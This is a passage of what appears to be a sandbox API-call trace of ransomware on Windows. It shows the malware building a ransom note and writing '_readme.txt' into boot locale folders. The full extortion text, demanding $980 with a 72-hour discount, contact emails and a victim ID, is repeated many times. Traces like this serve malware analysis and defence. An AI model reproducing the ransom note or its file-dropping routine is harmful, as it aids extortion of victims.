write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.847] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.847] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.847] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.847] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.848] CloseHandle (hObject=0x5cc) returned 1 [0090.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.849] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.849] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.849] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.849] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3372840, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.849] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3372840, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.849] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.849] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.849] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.850] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0090.850] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.850] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.850] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.850] PathFindFileNameW (pszPath="") returned="" [0090.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.851] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.851] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.851] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0090.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.851] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.851] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0090.851] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.851] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0090.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.852] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.852] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.852] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.852] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.852] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.853] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.853] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.853] CloseHandle (hObject=0x5cc) returned 1 [0090.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.854] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.854] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.854] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.854] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.854] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3372840, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.854] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3372840, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.854] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.854] HeapFree (in: 